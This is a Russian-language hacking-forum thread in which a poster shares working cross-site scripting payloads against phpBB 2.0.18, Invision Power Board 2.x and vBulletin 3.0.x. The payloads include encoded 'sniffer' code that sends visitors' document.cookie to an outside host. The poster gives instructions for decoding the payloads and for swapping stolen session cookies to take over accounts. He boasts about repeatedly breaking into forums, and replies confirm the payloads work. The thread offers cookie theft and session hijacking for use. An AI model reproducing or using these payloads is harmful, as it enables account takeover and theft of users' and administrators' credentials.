Mayalsya Ya opyati ot bezdeliya, i dymaiu....poidy phpbb 2.0.18 vzlomaiu.


Ny potratil nesoliko secund, koroche
lovite kod alerta:

http://www.wj (http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#97;&+#108;&+#101;&+#114;&+#116;&+#40;&+#41;&+#41;&+#32;)

Kod Sniffera:

http://www.wj (http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;)

Yberite znaki "+" V SPEZIUALINIUH simvolah!

http://webmastertools.narod.ru/OnlineTools/url_decode.html

Dlya redaktorovaniya kyk von vam ssiulka. Lychsche vsego v Browsere Opera i ne zabydite, chto izmenyaete toliko phpbb2mysql_data a phpbb2mysql_sid mozhete ne menyati i ne trogati.



Sniffak delaetsya ispolizyya ety ssiulky:

http://www.h4cky0u.org/encrypt/index.php

Ny i komy interesno, chitaite ety statiiu dlya profilaktiki

http://forum.antichat.ru/thread10119.html


Kak lomati fastbb po mnogochislennoiu prosibe posetiteleiu antichata.

Alert.

]


Sniffer:

]

Ne znaiu kak tam v fastbb rabotaet avtorizaziuya ne smotrel, no esli chto, to mozhno vsegda Adminy pomenyati
paroli samomy, potomy chto paroli menyaetsya na noviu, bez starogo.


Viuschla novaya versiya IPB 2.1.3

I lomaetsya eta versiya vot tak:

(Ya proveril, i naschel chto etot ko rabotaet na VSEH 2.* i na vseh 1.* IPB. )



wj@wj[/url].com ` style=`background:url(javaSCrip t:alert(/wj/))`


Kyki voryem vot tak:

wj@wj (http://www.wj.com`=`).com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`



Ny i vBulletin 3.0.9 (Rabotaet do vBulletin 3.0.7)

Hoti Ya yzhe ego v staroiui statie i viukladiuval, no ne vse kazhetsya ponyali osobenno novichki kak kod pravit chtobiu rabotal.

Sniffer.

http://www.]wj (wj[url)




Kstati, eto yzhe k wapbbs.


Viu svoiu forum posle moego tretiyago raza kak Ya vas vzlom opyati pochenili, a Ya OPYATI ego vzlomal. )


A kod ne viulozhy potomy chto diury zakroiite opyati i mne opyati pridetsya iskati tegi. Ne horoscho postypaiti Ya vas sorovno kogda hochy lomaiu!!!!! loooooooooool



White Jordan.

Отлично! А это работает на Vbuletin 350?

Mayalsya Ya opyati ot bezdeliya, i dymaiu....poidy phpbb 2.0.18 vzlomaiu.
слухай queen
а тебе не кажеться, что воровать чужое добро плого, в частности заниматся плагиатом
ЭТО ВСЕ коды Белого Джордана, если сам отказываешься в это поверить, то посмотри еще раз на эти коды и убедишься, у меня один в один такие же коды как у тебя, не могли мы с тобою одно и тоже подумать. Так что я думаю, ты сделаешь правильный вывод для себя, и удалишь свою тему.

а Wj, закончил свою карьеру=(
изменил свое поведение, свою асю, мыло, ник, стиль общения, и возможно где-то среди нас, но уже совсем другой =(
ага мне тож писал он хотя в моем контакт листе не был... да и вообще надоело наверно быть всеобщим посмешищем=) да кстати эти баги фигня они не проходят=)

в Ipb 2.0.4 всё проходит , просто супер.

ага мне тож писал он хотя в моем контакт листе не был... да и вообще надоело наверно быть всеобщим посмешищем=) да кстати эти баги фигня они не проходят=)
я бы не сказал конечно посмещищем, все таки он был знающим, как не крути но это так
xss и СИ он знал отлично.
а насчет его кодов, да, они работают тока надо немного их доработать, я проверял, все что он написал правда, и работает отлично, даже на ачате.
но я думал, то раньше, что &+#58 это наоборот, чтоб не срабатывало кодируют так, а у него выходит что все нормально.

я бы не сказал конечно посмещищем, все таки он был знающим, как не крути но это так
xss и СИ он знал отлично.
а насчет его кодов, да, они работают тока надо немного их доработать, я проверял, все что он написал правда, и работает отлично, даже на ачате.
но я думал, то раньше, что &+#58 это наоборот, чтоб не срабатывало кодируют так, а у него выходит что все нормально.
+ уберать надо.

WJ Конечно молодец не чё не скажешь!
Но все его XSS коды работают тока в IE.
Но ведь есть FireFoX Opera/
Коды в студию =)

S']WJ Конечно молодец не чё не скажешь!
Но все его XSS коды работают тока в IE.
Но ведь есть FireFoX Opera/
Коды в студию =)


нет лол конечно можно сделать так, чтобы работало и в Опере и в Фаерфоксе, но просто как то саму разумеется выкладывается для Ие, а потом читатель дописывает код для той версии браузера, которая ему нужна. Ты вообще знаешь СКОЛЬКО в мире разных браузеров??? Не могу же Я дописывать для каждого браузера коды! Это просто дело времени да и не нужно.

Есть много способов сделать чтобы коды работали в фаерфоксе кстати. Одна из них, эот использовать функцию onmouseover=alert(/wj/)
ну и размер увеличить до такой велечены, чтобы хочешь не хочешь а хер....да много способов есть!

Сам фаерфокс и опера, имеют меньше возможностей чем ИЕ это раз, так что Javascript без тегов и многое другое, не работает ни в фаерфоксе ни в опере.

ИЕ это вообще самый лучшый браузер в мире, но он менее из-за этого защищён.

Я та тут причём

wj ты опять себя выдал :)
Наверно следует ждать бана...хотя хз
А манера писать я как "Я" так и осталась :)
Я себя никогда не прятал. Что значит Я выдал себя? Я сам не знаю почему не банят, и сам не знаю за что банят.

Ха как интересно, просто столько слухов шло, что коды в статье не работали, проверив, Я нашёл что они и действительно не работают.

Хер знает почему, но видео которое Я снял, короче туда Я поместил уже рабочий код. Это видео будет ещё несколько дней там висеть потом оно само сотрётся.

А вообще хорошо, что в статье код не работает даже когда плюсики убераешь.... ломать не будут.

мх, да нет, всё работает вродебы...+document.cookie не забудьте правильно написать и тогда всё работает.

хм... специальными символами здесь будут только " (& + # 3 4 ; )? т.е. + убирается только в них?

Подскажите, а что нам даёт код алерта?

хм... специальными символами здесь будут только " (& + # 3 4 ; )? т.е. + убирается только в них?
Да.


NeMiNeM,

Показывает что всё работает. Если есть алёрт, будет всё остальное. И сниффер, и любой другой язык Javascript`а если сумеешь правильно всё написать.

Все прекрасно работает. Огромнейшее спасибо автору. Однако хотелось бы выяснить, есть ли подобные XSS для vb 3.5.x?

Все прекрасно работает. Огромнейшее спасибо автору. Однако хотелось бы выяснить, есть ли подобные XSS для vb 3.5.x?


Ну у меня конечно есть.

А в публику это Я выкладывать не хочу, так как это самый защищённый форум на сегодняшний день, (Я проверил) и хотелось бы на всякий пожарный, уметь его иметь. +)


NeMiNeM,

Сонный был, чуток не правильно сказал прочёл так сам засмеялся лол...


Алёрт показывает что всё работает. Если есть алёрт, будет всё остальное, и сниффер, и любая другая функция Javascript`а если с умеешь правильно всё написать обойдя все фильтры.

Вот так надо. +)

я проверял, все что он написал правда, и работает отлично, даже на ачате.

Что именно работает-то ?

2WJ
Тебе конечно упорства не занимать, в плане поиска багов, но не мешало бы помнить, что все баги якобы тобой найденные, на самом деле были найдены античатом, и с применением технологий, описанных здесь же. Поменьше самовозвеличивания.

Что именно работает-то ?

2WJ
Тебе конечно упорства не занимать, в плане поиска багов, но не мешало бы помнить, что все баги якобы тобой найденные, на самом деле были найдены античатом, и с применением технологий, описанных здесь же. Поменьше самовозвеличивания.
Ну не то, что все баги которые Я нахожу, уже нашёл античат....просто так скажу, 90% процентов, Я научился именно от тебя и zFailure`a. Больше всего от тебя. Это насчёт того, что с помощью тегов можно провести XSS атаку, засунув один тег в другой сам метод техники т.д. Вообще-то, если бы именно не ты, именно ты, то никто бы ничего не античате не знал так хорошо, как он знает, потому что ты был во многом первым и открыл море идей для других включая меня.

Теперь, многие твои идеи Я уже улучшил и постоянно улучшаю.

К примеру, уже спаренные теги, http://www.wj.gif[/IMG]]wj которые ты придумал или вложенные теги один в другой,

wj@wj.comhttp://www.wj.com

которые ты тоже придумал, уже для нашего времени - старьё. )
Я теперь использую тройные, а часто четверные комбинации тегов. Вот это уже извини подвинься, придумал именно Я. =)

и с применением технологий

Соглашаюсь, что до тебя всё, что почти все люди знали во всём мире, так это использовать одну из функций как
onmouseover=alert(/wj/)
увеличив буквы на всю страницу. Пришёл ты, и нашёл что в IE есть style=background:url(javascript:alert())
и существует третья, рабочая кавычка.
`

Это всё работает только в браузере Микрасофта. (ИЕ)

По всем доказательствам ты был первым, который это всё нашёл хотя не спорю, что это могли знать и другие люди, и ты мог быть не первым....ну во всяком случаи ты был первым, который вывел мир из тьмы незнания. )

Опять таки Я взял всю эту информацию и усовершенствовал её. Я теперь могу воровать куки во всех браузерах и делать это так, чтобы человек этого не заметил. Вот это тоже нашёл Я.

Античат был базой и есть база, вот так скажу........античатовская школа, инфлуировала много-численное количество людей. Но никто не стоит на месте. :cool:

Джордан, а твой способ будет совершенно бесполезен если админ просто-напросто не поставит галочку "запомнить" при входе...На сниффер придут куки без хэша. Только сессия и id юзера.

Джордан, а твой способ будет совершенно бесполезен если админ просто-напросто не поставит галочку "запомнить" при входе...На сниффер придут куки без хэша. Только сессия и id юзера.
А чей способ будет полезен?

Всем привет!
Попробовал коды WJ локально (Денвер+phpBB 2.0.18), все работает. На реальном же форуме (club.passion.ru) почему-то не пашет. Весь код после вставки появляется в сообщении, только спецсимволы на нормальные заменяются. В чем тут может быть дело?

Хочу переделать сниффер под себя, но к сожелению http://www.h4cky0u.org/encrypt/index.php у меня не работает! Кто знает где ещё есть такие декодеры или у кого откривается ета страница?

Edit: уже не нужно - нашёл!
Кому надо: http://www.christ4you.org/modules/xoopstools/index.php?func=URLENCODER

а можно сделать так, чтобы в алерте мой текст был ?

а можно сделать так, чтобы в алерте мой текст был ?
Можно

Можно
Только на латинице и без многих знаков препинания

Что именно работает-то ?



Уязвимость Булки 3.0.7 что же еще.

Только сейчас на античате тег фонт - просто отфильтруется. Не знаю сделано ли это чтобы показать, что никакого взлома не было, лoл, но по крайней мере свои атрибуты в теге фонт до сего дня можно вписывать. в теге фонт, теперь не пропускается кодировка UTF-8, слеши и скобки. А так, все до сих пор - работает.